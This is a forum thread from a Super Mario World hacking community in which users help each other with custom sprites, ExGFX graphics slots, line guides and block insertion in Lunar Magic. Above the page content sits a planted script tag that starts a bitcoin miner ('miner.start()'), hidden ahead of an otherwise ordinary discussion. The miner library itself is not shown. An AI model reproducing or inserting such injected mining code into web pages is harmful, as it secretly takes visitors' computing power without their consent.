<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communitymario fan games galaxy

Sprites and Blocks: Requests, help, and discussion.

we don't need no edu - I mean, these threads, anymore.
limepie20

Re: Sprites and Blocks: Requests, help, and discussion.

Postby limepie20 » 7 years ago

Try clicking on the lakitu in Lunar Magic and choosing sprite memory B.

Also, quick tip:
try to use less cement blocks and make your level out of land. It looks a lot better.

Leifytwig123

Postby Leifytwig123 » 7 years ago

Wow, thanks, that worked perfectly! Also, there won't be any cement blocks in the final level, they're just there to make the level playable until I've made the custom stuff.
There are 10 kinds of people in the world, those who know binary, and those who don't!

limepie20

Okay, just making sure!

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 7 years ago

Hey guys.

I'm looking for something for the level I'm working on, but since I am an utter and complete noob in all that asm and custom stuff I'm kindly requesting some help here !
So basically my level is sort of a shell-themed level, with blue koopas kicking shells all over the place. But to add some variety I thought putting some cannons that will shoot shells instead of the usual bullets. Now my question is : what do I need to do this? ASM? Custom blocks? a generator thingy? or none of the above...?

Or even better, is something like this already inserted in the game? I don't think I've seen any in the few levels i've played.

If someone could tell me what I need to do in order to insert this it will be greatly appreciated.

Ometeotl

Postby Ometeotl » 7 years ago

Do you want the bulletshell's design to be special in anyway, or just the static image of the shell laying on the ground?

Jesuiscontent
Tsundere

Ometeotl wrote:Do you want the bulletshell's design to be special in anyway, or just the static image of the shell laying on the ground?
Ah, sorry, guess I wasn't too clear about what I wanted. I was talking about a cannon that would shoot "running" shells, as in a shell after being kicked by a koopa, that falls off ledges and bounces off walls and stuff; thus the usual design of a shell would be perfectly fine. If you could do something like this, that would be awesome in a bucket :D

I will upload the level when I come back home if you want to see the general "feel" of the level.

Ometeotl

Postby Ometeotl » 7 years ago

I have no capabilities in what you need, I just wanted you to clarify what you wanted. Sorry for the confusion.

Jesuiscontent
Tsundere

Ometeotl wrote:I have no capabilities in what you need, I just wanted you to clarify what you wanted. Sorry for the confusion.
Auuuuwww :( You just crushed my hopes to dust... for eternity. Well not really for eternity if any talented kind soul manages to do this, but still!

Wyatt

Postby Wyatt » 7 years ago

A cannon that shoots moving shells? I remember seeing a few of those in hyper VI. Not sure if it's hard or frowned-upon to take a thing from another hack, but if not then that's a place you can get it.

If it helps, the level I'm thinking of is either the second or third level in world 6, the sewer world.

Jesuiscontent
Tsundere

Wyatt wrote:A cannon that shoots moving shells? I remember seeing a few of those in hyper VI. Not sure if it's hard or frowned-upon to take a thing from another hack, but if not then that's a place you can get it.

If it helps, the level I'm thinking of is either the second or third level in world 6, the sewer world.
Thanks ! I'll look it up, I didn't even know the hack wasn't locked.

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 7 years ago

I don't know how to access the custom sprites in the baserom. the custom sprite collections is empty.

limepie20

Your rom needs to be named a2mt and be in the folder the ips comes in.

Septentrion Pleiades
Banned

Thank you. I still don't know how to make the sprites look right. I might need a link to a tutorial.

edit: Just figured out to make them look right.

limepie20

For that, just open the SSC file that comes in the baserom. Look for the sprite you want to use and it should say something like SP2=xxx. The SP2 can be also be SP3 or SP4. The xxx is the exgfx file that sprite uses.
So, in Lunar Magic, click on the red poison mushroom and check the box at the top. Some of the options are SP2, 3, or 4. Change that to whatever exgfx the custom sprite uses (from the SSC).
That should work but it may mess up graphics for other sprites you want to use. If it does here's a thing about exgfx I've written before:
limepie20 wrote:The problem with the graphics is really easy to fix and once you learn it, you can do it with no problem. Go in Lunar Magic and look at the tileset specific sprites. Bob-omb is the first sprite there and if you look at the top right corner, you see "SP4=02". That doesn't make much sense if you don't know what it means but it's pretty simple, actually. Click on the red poison mushroom (Super GFX Bypass). This basically shows the graphics the level is using. If you look you can see an SP4. The reason the bob-omb said SP4=02 is because SP4 needs to be set to 02 in the Super GFX Bypass for the graphics to be correct. That's pretty much how to solve your problem.
But there may be some conflicts. Most of the tileset specific sprites use SP3 and SP4 and some of the graphics in your level may be screwed up if you change the SP3/4. For instance, Thwomp needs SP4 to equal 03 and the Hopping flame needs SP4 to equal 02. Obviously, SP4 can't both be 02 and 03, but there is a solution and it requires exgfx. When you press the red mushroom it extracts the graphics which creates a folder named 'Graphics' in the same folder as your rom. That folder contains all the global graphics for that rom (note: you need a program called yy-chr to view and edit these graphics files. If you don't alreayd have it, I suggest downloading it from smwc; it is very useful in smw hacking). There will be a bunch of differently numbered files and they= numbers have a meaning. Remember the bob-omb? SP4=02. That means the bob-omb's graphics are in the file "GFX02". SO the hopping flame and thwomp's graphics are in files GFX02 and GFX03. Copy/paste file GFX02 (they are interchangeable so you can copy/paste 03 and do the rest opposite). Now you have a second gfx file with the hopping flame and the other things in that gfx file. Open up gfx 03 and copy/paste all of the thwomp's tiles into the copy of GFX02. Now be careful here, you can't just place the thwomp anywhere in the graphics file. You need to put it in the same exact position as in GFX03. Now you combined the two gfx files so the thwomp and hopping flame can be in the same gfx file (obviously, if the thwomp and hopping flame where in the same position in the gfx files, it would be impossible to combine the gfx files and put them in the same level (they might be; i didn't check)). Now insert that new file as an exgfx file.

Sorry if I over explained. I don't know your smw hacking knowledge so I'm just staying safe. If you don't know how to insert/use exgfx, tell me and I'll tell you.

Septentrion Pleiades
Banned

I only have access to sprites 0-30 in the custom sprites collection, even though the sprite list text file list had more.
I mostly want the fakegoal(76)

limepie20

Yeah, if you want anything past 30, be on sprite editing mode and press insert. For the sprite, write the custom sprite number you want. Then for the extra bit, write 2. The sprite will appear in the top left corner of the first screen so you can change the other two inputs if you want.

Leifytwig123

Hopefully my last question, do the line guide objects(the ones that the platforms, saws, and fuzzies follow) only show up if they are in a level with the right tileset? I'm using sublevel 070 and the line guides aren't in the objects or sprites menus anywhere. Do I need to get a different sublevel that supports them or am I doing something wrong.
There are 10 kinds of people in the world, those who know binary, and those who don't!

Paralars

Postby Paralars » 7 years ago

they are number 38+ in the tileset specific object menu, or the first map16 page.
They use FG/BG tileset 2/6/8 (click the purple poison mushroom to change)
or just GFX16 in the FG3 slot (click the red poison mushroom to change)

Leifytwig123

Thanks, Paralars!!!

TomPhanto

Postby TomPhanto » 7 years ago

I need Slot 51 for my level:
It's the Pendulum Ball n' Chain
Keys are important. When a key is lost, all madness shall break loose.

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 7 years ago

I'm pretty sure pendolums were already used, you should re-use it from there level! (I have absolutely no idea what sprite number it is though)
the chillaxest of dragonsImage
ImageImage

Paralars

Demetri requested and uses it, but he's not around.
Maybe limepie knows.
And what's up with you still reading spoilers here and there? :mrgreen:
I guess I can forgive you raocow, because of dat announcement video today

limepie20

I can remember two levels that used pendulums but neither of them were ever finished (one being Demitri's, the other being yoshiguy's). So 51 is yours.

Also, please put all your requests in the signups thread; that's where they go.

Paralars

Do iceball bros throw iceballs?
Why don't they use the spitting animation?

Oh and why do the fireball plants still use palette C or D, the standard graphics are designed for palette A colors A-F, I see black plant heads everywhere.

Leifytwig123

When I try to insert my block from block tool, it says that "Map16 out of range". I'm trying to insert it at 0x5D00. Why won't it work?

Return to “left-overs...”